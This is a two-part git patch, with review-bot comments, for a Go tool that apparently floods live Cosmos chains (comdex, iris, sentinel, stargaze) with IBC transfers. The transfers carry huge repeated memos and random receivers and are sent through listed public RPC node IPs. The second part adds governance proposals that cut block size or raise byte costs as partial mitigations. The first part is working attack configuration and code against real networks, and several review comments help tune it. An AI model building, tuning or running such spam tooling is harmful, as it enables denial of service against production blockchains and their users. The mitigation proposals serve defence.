From 82fc29710176df7e9779e50b6f3d4edd6719d021 Mon Sep 17 00:00:00 2001 From: Jacob Gadikian Date: Sun, 26 May 2024 17:51:24 +0200 Subject: [PATCH 1/2] stargaze --- .gitignore | 2 +- broadcast.go | 11 +++++++--- configurations/comdex/nodes.toml | 34 ++++++++++++++++++++++++++++++ configurations/iris/nodes.toml | 32 ++++++++++++++++++++++++++++ configurations/sentinel.toml | 29 +++++++++++++++++++++++++ configurations/sentinel/nodes.toml | 29 +++++++++++++++++++++++++ configurations/stargaze/nodes.toml | 32 ++++++++++++++++++++++++++++ nodes.toml | 1 + types.go | 19 ++++++++++------- 9 files changed, 177 insertions(+), 12 deletions(-) create mode 100644 configurations/comdex/nodes.toml create mode 100644 configurations/iris/nodes.toml create mode 100644 configurations/sentinel.toml create mode 100644 configurations/sentinel/nodes.toml create mode 100644 configurations/stargaze/nodes.toml diff --git a/.gitignore b/.gitignore index 17cd85c..08b57d3 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1 @@ -seedphrase \ No newline at end of file +**seedphrase \ No newline at end of file diff --git a/broadcast.go b/broadcast.go index 375abb8..2c8c730 100644 --- a/broadcast.go +++ b/broadcast.go @@ -63,14 +63,19 @@ func sendIBCTransferViaRPC(config Config, rpcEndpoint string, chainID string, se // receiver, _ := generateRandomString() token := sdk.NewCoin(config.Denom, sdk.NewInt(1)) - memo := strings.Repeat("failure isn't fraud", 1000) + memo := strings.Repeat(config.IBCMemo, config.IBCMemoRepeat) + + ibcaddr, err := generateRandomString(config) + if err != nil { + return nil, "", err + } msg := types.NewMsgTransfer( "transfer", config.Channel, token, address, - "celestia13ln6j9u70p6r28n5zdq9a7kj98h5hjk2dtrzk7", + ibcaddr, clienttypes.NewHeight(0, 21000000), // Adjusted timeout height uint64(0), memo, 
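Review bot: The new pattern `**seedphrase` is not a recursive glob, because git only gives `**` special meaning next to a slash; it is read as `*seedphrase` and matches file names that end in `seedphrase`. The old `seedphrase` entry already matched at every directory level, so the per-chain folders under `configurations/` added in this commit were covered before the change. If the aim is to catch variants such as `seedphrase.txt`, `*seedphrase*` says that directly. An ignore rule also does nothing for a file that is already tracked, so it is worth confirming with `git ls-files` that no key material was committed earlier.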
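Review bot: `config.IBCMemoRepeat` goes from the TOML file straight into `strings.Repeat` with no range check, and `strings.Repeat` panics on a negative count or when the result length overflows. Reject bad values before building the memo, for example `if config.IBCMemoRepeat < 0 { return nil, "", errors.New("ibc_memo_repeat must not be negative") }`, and consider an upper bound so a typo in a config file cannot allocate an arbitrarily large string. For anyone filtering this traffic on the receiving side, the memo text and the receiver address are no longer constants after this hunk, so size limits are a more durable control than matching the removed literals. Whether `errors` is imported is not visible here, and the function body starts and ends outside the hunk.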
@@ -88,7 +93,7 @@ func sendIBCTransferViaRPC(config Config, rpcEndpoint string, chainID string, se txBuilder.SetGasLimit(gasLimit) // Calculate fee based on gas limit and a fixed gas price - gasPrice := sdk.NewDecCoinFromDec(config.Denom, sdk.NewDecWithPrec(1, int64(config.Gas.Low))) // 0.1 token per gas unit + gasPrice := sdk.NewDecCoinFromDec(config.Denom, sdk.NewDecWithPrec(1, 0)) // 1 token per gas unit feeAmount := gasPrice.Amount.MulInt64(int64(gasLimit)).RoundInt() feecoin := sdk.NewCoin(config.Denom, feeAmount) txBuilder.SetFeeAmount(sdk.NewCoins(feecoin)) diff --git a/configurations/comdex/nodes.toml b/configurations/comdex/nodes.toml new file mode 100644 index 0000000..bf6727f --- /dev/null +++ b/configurations/comdex/nodes.toml @@ -0,0 +1,34 @@ +chain = "comdex" +channel = "channel-0" +denom = "ucmdx" +prefix = "comdex" +gas_per_byte = 10 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 100 +rand_min = 300000 +rand_max = 400000 +memo = "Informal and Strangelove say it's not a security issue" + +[gas] +zero = 0 +low = 0 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://65.108.101.19:24557", + "http://142.132.253.13:51657", + "http://188.214.134.118:26657", + "http://62.171.182.242:56657" + + + +] + +api = "https://comdex-api.lavenderfive.com:443" + + + diff --git a/configurations/iris/nodes.toml b/configurations/iris/nodes.toml new file mode 100644 index 0000000..d67761c --- /dev/null +++ b/configurations/iris/nodes.toml 
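Review bot: The gas price is now the constant `sdk.NewDecWithPrec(1, 0)`, so the fee computed on the following lines always equals `gasLimit` in base units and `config.Gas` is no longer read on this path, although every `nodes.toml` added in this commit still ships a `[gas]` table. Either document the fixed price at the call site, e.g. `// fixed at 1 <denom> per gas unit; the [gas] table in nodes.toml is not consulted here`, or drop the unused table from the configs so readers do not assume it has an effect. The enclosing function starts and ends outside the hunk.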
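Review bot: The `[gas]` table in `configurations/comdex/nodes.toml` has `high = 0.04` below `medium = 0.25`, so the tier names do not describe increasing prices, and `low = 0` duplicates `zero`. The same `medium`/`high` pair is copied into the iris, sentinel and stargaze files added in this commit, which suggests a carried-over typo rather than per-chain values. If `high` was meant to be larger than `medium`, correct it once and copy from there; otherwise a comment such as `# tiers are not ordered; values are placeholders` would stop readers from trusting the names. This is also the only config that sets `memo`, with the same text as `ibc_memo`, and nothing here says which of the two is used.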
@@ -0,0 +1,32 @@
+chain = "iris"
+channel = "channel-0"
+denom = "uiris"
+prefix = "iaa"
+gas_per_byte = 10
+base_gas = 100000
+ibc_memo = "Informal and Strangelove say it's not a security issue"
+ibc_memo_repeat = 100
+rand_min = 300000
+rand_max = 400000
+
+[gas]
+zero = 0
+low = 0.001
+medium = 0.25
+high = 0.04
+
+
+[nodes]
+rpc = [
+ "http://89.163.225.93:26657",
+ "http://135.181.113.227:1905",
+ "http://65.108.232.168:11657",
+ "http://46.38.232.86:30657",
+ "http://65.109.94.26:36609",
+
+]
+
+api = "https://api-irisnet-01.stakeflow.io:443"
+
+
+
diff --git a/configurations/sentinel.toml b/configurations/sentinel.toml
new file mode 100644
index 0000000..e46ff98
--- /dev/null
+++ b/configurations/sentinel.toml
@@ -0,0 +1,29 @@
+chain = "sentinel"
+channel = "channel-50"
+denom = "udvpn"
+prefix = "sent"
+gas_per_byte = 150
+base_gas = 100000
+ibc-channel = "channel-0"
+ibc_memo = "Informal and Strangelove say it's not a security issue"
+rand_min = 300000
+rand_max = 400000
+
+[gas]
+zero = 0
+low = 0.1
+medium = 0.25
+high = 0.04
+
+
+[nodes]
+rpc = [
+ "http://207.148.0.61:26657",
+ "http://188.34.151.177:26657",
+ "http://65.108.103.184:25657",
+]
+
+api = "https://sentinel-api.polkachu.com:443"
+
+
+
diff --git a/configurations/sentinel/nodes.toml b/configurations/sentinel/nodes.toml
new file mode 100644
index 0000000..fe53c4c
--- /dev/null
+++ b/configurations/sentinel/nodes.toml
@@ -0,0 +1,29 @@
+chain = "sentinel"
+channel = "channel-50"
+denom = "udvpn"
+prefix = "sent"
+gas_per_byte = 150
+base_gas = 100000
+ibc_memo = "Informal and Strangelove say it's not a security issue"
+ibc_memo_repeat = 500
+rand_min = 300000
+rand_max = 400000
+
+[gas]
+zero = 0
+low = 0.1
+medium = 0.25
+high = 0.04
+
+
+[nodes]
+rpc = [
+ "http://207.148.0.61:26657",
+ "http://188.34.151.177:26657",
+ "http://65.108.103.184:25657",
+]
+
+api = "https://sentinel-api.polkachu.com:443"
+
+
+
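Review bot: In `configurations/sentinel.toml` the key is spelled `ibc-channel`, but the `Config` struct changed in this same patch binds the field with the tag `toml:"ibc_channel"`, so this value will not be decoded into `IBCChannel`; depending on how the decoder is configured it is either ignored silently or rejected as an unknown key. The same spelling is added to the root `nodes.toml`. Rename both to `ibc_channel = "channel-0"`. This file is also byte-identical to the new root `nodes.toml` (both are blob `e46ff98`) and sits beside `configurations/sentinel/nodes.toml`, so one of the copies can probably go.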
diff --git a/configurations/stargaze/nodes.toml b/configurations/stargaze/nodes.toml new file mode 100644 index 0000000..09f5ca4 --- /dev/null +++ b/configurations/stargaze/nodes.toml @@ -0,0 +1,32 @@ +chain = "stargaze" +channel = "channel-0" +denom = "ustars" +prefix = "stars" +gas_per_byte = 10 +base_gas = 100000 +ibc_memo = "Informal and Strangelove say it's not a security issue" +ibc_memo_repeat = 100 +rand_min = 300000 +rand_max = 400000 + +[gas] +zero = 0 +low = 0.001 +medium = 0.25 +high = 0.04 + + +[nodes] +rpc = [ + "http://65.108.131.62:26657", + "http://65.109.104.74:26657", + "http://65.108.141.109:8657", + "http://65.21.134.243:26670", + "http://65.108.75.107:8657", + +] + +api = "https://rest.stargaze-apis.com:443" + + + diff --git a/nodes.toml b/nodes.toml index e11d649..e46ff98 100644 --- a/nodes.toml +++ b/nodes.toml @@ -4,6 +4,7 @@ denom = "udvpn" prefix = "sent" gas_per_byte = 150 base_gas = 100000 +ibc-channel = "channel-0" ibc_memo = "Informal and Strangelove say it's not a security issue" rand_min = 300000 rand_max = 400000 diff --git a/types.go b/types.go index 47fd72b..565c3db 100644 --- a/types.go +++ b/types.go @@ -115,14 +115,17 @@ type Fee struct { } type Config struct { - Chain string `toml:"chain"` - Channel string `toml:"channel"` - Prefix string `toml:"prefix"` - Bytes int `toml:"gas_per_byte"` - IBCMemo string `toml:"ibc_memo"` - BaseGas int `toml:"base_gas"` - Denom string `toml:"denom"` - Gas struct { + Chain string `toml:"chain"` + Channel string `toml:"channel"` + Prefix string `toml:"prefix"` + Bytes int `toml:"gas_per_byte"` + Memo string `toml:"memo"` + IBCMemo string `toml:"ibc_memo"` + IBCMemoRepeat int `toml:"ibc_memo_repeat"` + IBCChannel string `toml:"ibc_channel"` + BaseGas int `toml:"base_gas"` + Denom string `toml:"denom"` + Gas struct { Zero float64 `toml:"zero"` Low float64 `toml:"low"` Medium float64 `toml:"medium"` From a1b2b93d7d6a8fead19479a33031222bf31a136b Mon Sep 17 00:00:00 2001 
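Review bot: The four fields added to `Config` in `types.go` carry no comments, and `Memo` next to `IBCMemo` in particular gives no hint which transaction type each one feeds or which wins when both are set. `IBCMemoRepeat` is a signed `int` with no documented range, and `IBCChannel` sits beside the existing `Channel` without saying how the two differ. Add a one-line comment per field, e.g. `// IBCMemoRepeat is the number of times IBCMemo is concatenated; must be >= 0`. The struct continues past the end of the hunk.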
From: Jacob Gadikian
Date: Sun, 26 May 2024 18:17:02 +0200
Subject: [PATCH 2/2] add docs on fixing the issue
---
cure/Readme.md | 41 ++++++++++++++++++++++++++++++++++++
cure/cure-sentinel.json | 14 ++++++++++++
cure/cure.json | 14 ++++++++++++
cure/sentinel/blocksize.json | 14 ++++++++++++
cure/sentinel/bytes.json | 12 +++++++++++
5 files changed, 95 insertions(+)
create mode 100644 cure/Readme.md
create mode 100644 cure/cure-sentinel.json
create mode 100644 cure/cure.json
create mode 100644 cure/sentinel/blocksize.json
create mode 100644 cure/sentinel/bytes.json
diff --git a/cure/Readme.md b/cure/Readme.md
new file mode 100644
index 0000000..df99ec4
--- /dev/null
+++ b/cure/Readme.md
@@ -0,0 +1,41 @@
+# Cures
+
+Assaf Morami of Secret Network has provided me with an example transaction that adjusts the maximum block size by governance.
+
+I give him huge credit. Both myself and Jehan Tremback were not aware this was possible.
+
+## Note
+
+This cure doesn't seem to work. While reducing block sizes dramatically reduces risk and I do recommend it to ensure that block gossip is not too impactful as a % of p2p traffic, it seems that this attack can be replicated with only mempool p2p traffic.
+
+Still probably a good idea.
+
+
+```bash
+appd tx gov submit-proposal param-change ./path/to/cure.json --from key -y -b block
+```
+
+example used on Osmosis
+
+```bash
+osmosisd tx gov submit-proposal param-change cure.json --from icns --keyring-backend file --fees 2000uosmo
+```
+
+
+
+```json
+{
+ "title": "Reduce Maximum Block Size",
+ "description": "This Proposal reduces the maximum block size pursuant to: https://github.com/cometbft/cometbft/security/advisories/GHSA-hq58-p9mv-338c",
+ "changes": [
+ {
+ "subspace": "baseapp",
+ "key": "BlockParams",
+ "value": {
+ "max_bytes": "1048576"
+ }
+ }
+ ],
+ "deposit": "100000000uatom"
+}
+```
diff --git a/cure/cure-sentinel.json b/cure/cure-sentinel.json
new file mode 100644
index 0000000..18d794e
--- /dev/null
+++ b/cure/cure-sentinel.json
@@ -0,0 +1,14 @@
+{
+ "title": "Reduce Maximum Block Size",
+ "description": "This Proposal reduces the maximum block size to reduce the potential impact of spam. github.com/notional-labs/placid",
+ "changes": [
+ {
+ "subspace": "baseapp",
+ "key": "BlockParams",
+ "value": {
+ "max_bytes": "1048576"
+ }
+ }
+ ],
+ "deposit": "500000000000udvpn"
+}
diff --git a/cure/cure.json b/cure/cure.json
new file mode 100644
index 0000000..c557abc
--- /dev/null
+++ b/cure/cure.json
@@ -0,0 +1,14 @@
+{
+ "title": "Reduce Maximum Block Size",
+ "description": "This Proposal reduces the maximum block size pursuant to: https://github.com/cometbft/cometbft/security/advisories/GHSA-hq58-p9mv-338c",
+ "changes": [
+ {
+ "subspace": "baseapp",
+ "key": "BlockParams",
+ "value": {
+ "max_bytes": "1048576"
+ }
+ }
+ ],
+ "deposit": "100000000uatom"
+}
\ No newline at end of file
diff --git a/cure/sentinel/blocksize.json b/cure/sentinel/blocksize.json
new file mode 100644
index 0000000..18d794e
--- /dev/null
+++ b/cure/sentinel/blocksize.json
@@ -0,0 +1,14 @@
+{
+ "title": "Reduce Maximum Block Size",
+ "description": "This Proposal reduces the maximum block size to reduce the potential impact of spam. github.com/notional-labs/placid",
+ "changes": [
+ {
+ "subspace": "baseapp",
+ "key": "BlockParams",
+ "value": {
+ "max_bytes": "1048576"
+ }
+ }
+ ],
+ "deposit": "500000000000udvpn"
+}
diff --git a/cure/sentinel/bytes.json b/cure/sentinel/bytes.json
new file mode 100644
index 0000000..62e0284
--- /dev/null
+++ b/cure/sentinel/bytes.json
@@ -0,0 +1,12 @@
+{
+ "title": "Increase TxSizeCostPerByte 15x",
+ "description": "This Proposal increases the cost of bytes to reduce the potential impact of spam. github.com/notional-labs/placid",
+ "changes": [
+ {
+ "subspace": "auth",
+ "key": "TxSizeCostPerByte",
+ "value": "150"
+ }
+ ],
+ "deposit": "500000000000udvpn"
+}
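Review bot: `cure/cure-sentinel.json` and `cure/sentinel/blocksize.json` are the same blob (`18d794e`), so the block-size proposal now exists in two places that can drift apart. Keep one copy and have `cure/Readme.md` point at it; the Readme also embeds a further copy of the `uatom` variant from `cure/cure.json`.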